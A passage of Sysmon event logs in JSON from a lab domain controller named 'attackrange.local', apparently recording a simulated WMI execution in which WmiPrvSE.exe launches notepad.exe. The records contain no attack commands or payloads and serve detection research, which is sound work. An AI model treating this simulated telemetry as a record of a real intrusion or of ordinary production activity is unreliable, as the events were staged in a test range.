07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.377\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.377","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.377\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.377","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.404\r\nProcessGuid: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nProcessId: 4620\r\nImage: C:\\Windows\\System32\\notepad.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Notepad\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NOTEPAD.EXE\r\nCommandLine: notepad.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=3B508CAE5DEBCBA928B5BC355517E2E6,SHA256=DA0ACEE8F60A460CFB5249E262D3D53211EBC4C777579E99C8202B761541110A,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82\r\nParentProcessGuid: {41C8662E-20D1-5F25-0000-001016430800}\r\nParentProcessId: 4288\r\nParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\r\nParentCommandLine: C:\\Windows\\system32\\wbem\\wmiprvse.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.404","ProcessGuid":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","Image":"C:\\Windows\\System32\\notepad.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Notepad","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"NOTEPAD.EXE","CommandLine":"notepad.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=3B508CAE5DEBCBA928B5BC355517E2E6,SHA256=DA0ACEE8F60A460CFB5249E262D3D53211EBC4C777579E99C8202B761541110A,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82","ParentProcessGuid":"{41C8662E-20D1-5F25-0000-001016430800}","ParentProcessId":"4288","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\wbem\\cimwin32.dll+3adce|C:\\Windows\\system32\\wbem\\cimwin32.dll+3d475|C:\\Windows\\system32\\wbem\\cimwin32.dll+3ab15|C:\\Windows\\system32\\wbem\\cimwin32.dll+3b393|C:\\Windows\\system32\\wbem\\cimwin32.dll+3bb40|C:\\Windows\\SYSTEM32\\framedynos.dll+20256|C:\\Windows\\SYSTEM32\\framedynos.dll+218b5|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1704a|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1724f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\wbem\\cimwin32.dll+3adce|C:\\Windows\\system32\\wbem\\cimwin32.dll+3d475|C:\\Windows\\system32\\wbem\\cimwin32.dll+3ab15|C:\\Windows\\system32\\wbem\\cimwin32.dll+3b393|C:\\Windows\\system32\\wbem\\cimwin32.dll+3bb40|C:\\Windows\\SYSTEM32\\framedynos.dll+20256|C:\\Windows\\SYSTEM32\\framedynos.dll+218b5|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1704a|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1724f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 